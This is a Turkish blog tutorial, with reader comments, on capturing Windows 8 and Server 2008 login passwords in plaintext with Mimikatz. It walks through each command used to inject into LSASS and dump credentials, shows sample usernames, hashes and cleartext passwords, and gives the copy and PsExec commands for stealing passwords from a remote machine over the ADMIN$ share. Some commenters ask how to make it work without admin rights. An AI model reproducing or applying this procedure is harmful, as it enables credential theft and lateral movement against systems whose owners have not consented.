İlginizi Çekebilir
  1. Ana Sayfa
  2. Windows 8
  3. Windows 8 Hacking – Kullanıcı Şifreleri Nasıl Ele Geçirilir – Dump Password

Windows 8 Hacking – Kullanıcı Şifreleri Nasıl Ele Geçirilir – Dump Password

Bu makalemizde Windows 8 işletim sisteminde kullanıcı şifrelerinin salt metin olarak ele geçirme işlemini konu aldım. Windows 8 ve öncesi işletim sistemlerinde oturum şifreleri WDigest (wdigest.dll) üzerinden metinsel olarak elde edilebilir.

WDigest nedir?

WDigest (Digest Kimlik Doğrulama Protokolü), http (Hyper Text Transfer Protocol) ve SASL (Simple Authentication Security Layer) protokolleri ile kullanılmak üzere tasarlanmıştır. Digest protokolü, gizli bir anahtar kullanarak özet kimlik doğrulaması ve diğer protokollerin güvenli yuva üzerinden aktarımını sağlar. Windows Server 2003 Active Directory’e entegre edilen bu protokol, SASL ve LDAP authentication’ları bütünlüğü koruma görevi üstlenir ve Windows Server 2003 işletim sistemi ve sonraki işletim sistemlerinde kullanılmaktadır. (Örneğin Windows Server 2008, 2008 R2 vb.) Özet kimlik doğrulaması bir MD5 hash veya ileti özeti olarak ağ üzerinden bilgilerini iletir ve böylece temel kimlik doğrulaması üzerinde artırılmış güvenlik sağlar.


Resim-1

Digest Authentication Protocol’ün diğer protokoller ile uygunluğu Resim-1’deki gibidir.

Bu güvenlik protokolü kullanarak, yerel kullanıcı hesaplarının ve active directory yönetici şifreleri ele geçirilebilir. Bunu sağlamak için “” aracını kullanacağız.

Mimikatz’ı indirmek için buraya tıklayın. İndirdiğiniz dosyanın şifresi 123 şeklindedir.

Mimikatz aracını yukarıdaki adresten indirip masaüstüne çıkarıyoruz.

Saldırı Evresi:

a-) Yerel Kullanıcı Hesap Şifresini Ele Geçirme:

Masaüstüne indirmiş olduğumuz mimikatz klasörünün içerisine giriyoruz. İşletim sistemin sürümü eğer 32 bit ise Win32, 64 bit ise x64 klasörüne giriyoruz.


Resim-2

Resim-2’deki gibi mimikatz.exe dosyasına sağ tıklayıp Run as administrator’ı tıklıyoruz.


Resim-3

Mimikatz.exe Resim-3’teki gibi açılacaktır.

Windows 8 oturum şifrelerini ele geçirmek için aşağıdaki 3 komutu kullanacağız.

  1. privilege::debug (Hata ayıklama modunu etkinleştirir)
  2. inject::process lsass.exe sekurlsa.dll (LSASS.exe içerisine sekurlsa.dll dosyasını enjekte eder)
  3. @getLogonPasswords (Enjekte ettiğimiz dosya üzerinden şifreler ele geçirilir)


Resim-4

privilege::debug komutu ile hata ayıklama modunu etkineştiriyoruz.


Resim-5

inject::process lsass.exe sekurlsa.dll komutu ile lsass.exe içerisine sekurlsa.dll kütüphanesi enjekte ediyoruz.


Resim-6

  1. Bilgisayar adı veya domain adı (WIN-1NHFIOHSMU4 – Hemen üstünde ise kullanıcı adı yer almaktadır –[Eyup])
  2. Wdigest, tspkg ve kerberos şifreleri (Password1) görünmektedir.


Resim-7

sekurelsa::logonPasswords full komutu ile detaylı olarak parolayı elde edebiliriz.

  1. Kullanıcı adı (Eyup) ve bilgisayar-domain adı (WIN-1NHFIOHSMU4)
  2. Kullanıcının LM ve NTLM Hash bilgileri
  3. Kullanıcının metinsel şifresi

b-) Uzak Oturumların Şifresini Ele Geçirme:

Uzak oturum şifrelerini ele geçirmek için mimikatz’a yerleşik olan Psexec üzerinden net komutunu kullanacağız. Sekurlsa.dll dosyasını uzaktaki hedef bilgisayara kopyalayacağız.

Not: ADMIN$ paylaşımının daha önce yapılmış olması gerekmektedir. Bu işlemde de Windows Server 2008 32 bit kullanan bir bilgisayarın oturum şifrelerini ele geçireceğiz. Hedef işletim sisteminin sürümünü bilmemiz gerekmektedir. Bunun için Nmap (Zenmap) kullanabilirsiniz.

Hedef işletim sisteminin sürümüne uygun olan Sekurlsa.dll dosyasını hedef bilgisayarın System32 klasörüne kopyalıyoruz. Bunun için komut moduna açarak mimikatz klasörüne giriyoruz ve copy Win32\sekurlsa.dll \\192.168.245.129\ADMIN$\System32 komutu ile sekurlsa.dll dosyasını hedef bilgisayarın %systemroot%\System32 klasörüne kopyalıyoruz.


Resim-8

Daha sonra sisteme bağlantı kurmak için önce masa üzerinde bulunan mimikatz\tools klasörüne erişiyoruz. PsExec.exe /accepteula \\192.168.245.129 –c C:\Users\Eyup\Desktop\mimikatz\Win32\mimikatz.exe komutunu çalıştırıyoruz. PsExec hedef bilgisayardaki sekurlsa.dll dosyası üzerinden lsass.exe dosyasına erişmemizi sağlayacaktır. mimikatz # ekranını gördüğümüzde işlem başarı ile gerçekleşmiş demektir.


Resim-9

privilege::debug komutu ile hata ayıklama modunu etkinleştiriyoruz.


Resim-10

inject::process lsass.exe sekurlsa.dll komutu ile lsass.exe dosyasına sekurlsa.dll dosyasını enjekte ediyoruz.


Resim-11

@getLogonPasswords komutu ile hedef bilgisayarın oturum şifresini öğreniyoruz.

  1. Kullanıcı adı (Administrator) ve bilgisayar adı (WIN-0JFVCT0IO4J)
  2. Kullanıcı şifresi (123321)

Dip Not: Windows XP işletim sistemi ve üzeri tüm Windows işletim sistemlerinde (Windows 7, Windows Server 2003 v.s) WDigest protokolü yüklü olduğundan dolayı bu yöntem hepsinde çalışmaktadır.

Güvenli günler.

Bu konuyla ilgili sorularınızı https://forum.mshowto.org linkini kullanarak ulaşacağınız forum sayfamızda sorabilirsiniz.

Referanslar

http://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx

Yorum Yap

Yazar Hakkında

15+ yıllık siber güvenlik dünyasındaki çalışmaları ile tanınan Eyüp Çelik, birçok defans ve hack grubunu yöneterek siber güvenlik alanında adını duyurmuştur. Doksanlı yıllardan bu yana siber güvenlik alanında çalışmalarını sürdüren Eyüp Çelik’in uzmanlık alanları arasında sistem, ağ alt yapısı, veritabanı yapıları, yazılım ve web en başta gelmektedir. Visual C++, C# ve benzeri dillerde 10 yılı aşkın tecrübeye sahip olan Eyüp Çelik .NET platformu üzerinde siber güvenlik (hacking) araçları geliştirerek blogu üzerinden paylaşmakta ve açık kaynak dünyasına hediye etmektedir. Profesyonel iş hayatındaki kariyerine 2006 yılından sonra beyaz şapkalı hacker olarak devam eden Çelik, ülkemizin en önemli bilişim, adli analiz ve bilgi güvenliği firmalarında beyaz şapkalı hacker, defans ve ar-ge ekiplerini yönetmiştir. Aynı zamanda eğitmen kimliği ile birçok farklı üniversitede ve kurumda 200’den fazla konferansa katılarak siber güvenlik sektörüne değer katmıştır. Eğitimler, konferanslar ve benzeri birçok alanda üniversite öğrencilerine yön gösterici kimliği ile tanınan Eyüp Çelik, ülkemizin önde gelen eğitim kurumlarında etik hackerlik, web güvenliği, ileri seviye sızma testleri ve benzeri birçok konuda eğitimler vermeye devam etmektedir. Kariyerindeki en önemli adımlarını ülkemizin önde gelen danışmanlık firmalarında sürdürmeye devam eden Çelik, Siber Güvenlik ve AR-GE Direktörü ünvanı ile birçok kamu kurumuna ve özel sektördeki kritik kurumlara siber güvenlik danışmanlığı ve eğitim hizmetleri sunmuştur. Boş vakitlerini profesyonel fotoğrafçılık yeteneği ile devam ettiren Çelik, 2018 yılı itibari ile Privia Security ve Kodia firmalarını kurarak, siber güvenlik sektörüne farklı bir bakış açısı getirmeyi amaç edinmiş ve son bir yıldır ülkemizin en değerli kamu ve özel sektör firmalarına siber güvenlik danışmanlığı, AR-GE ve eğitim konularında hizmet vermeye devam etmektedir.

Yorum Yap

Yorumlar (8)

  1. enjecte etme aşamasında erişim engelleniyor napmalıyım

  2. Merhabalar. Erişim engelleniyorsa sağ clicleyip yönetici olarak çalıştır (Run as Administrator) dersen sorunsuz çalışacaktır.

  3. Kullanıcı adı veya parola yanlış diyor uzaktaki biri bilgisayara dosya kopyalamaya çalıştığımda.

    C:\mimikatz>copy x64\sekurlsa.dll \\192.168.0.62\ADMIN$\SYSTEM32
    Kullanıcı adı veya parola hatalı.
    0 file(s) copied.

  4. 6 sene önce

    Bu işlem kısıtlı kullanıcı hesabına sahip oturumlarda yapılamıyor gördüğüm kadarıyla. Debug modu etkinleştirilemiyor, çünkü yönetici ayrıcalıklarına sahip olmuyorsunuz. Bunu yapamadığınız için de dosya enjekte etme komutları “erişim engellendi” hatası veriyor. Kısıtlı kullanıcılar için de böyle bir çözüm sunabilir misiniz?

  5. Ben en son adıma kadar yaptım ama o şifrelerin yazıldığı yerde n.t. yazıyor. Şifre olarak yazdığımda da kabul etmiyor

  6. Kardeşim Tüm Kullanıcıların Şifresi Görüntülenmiyor?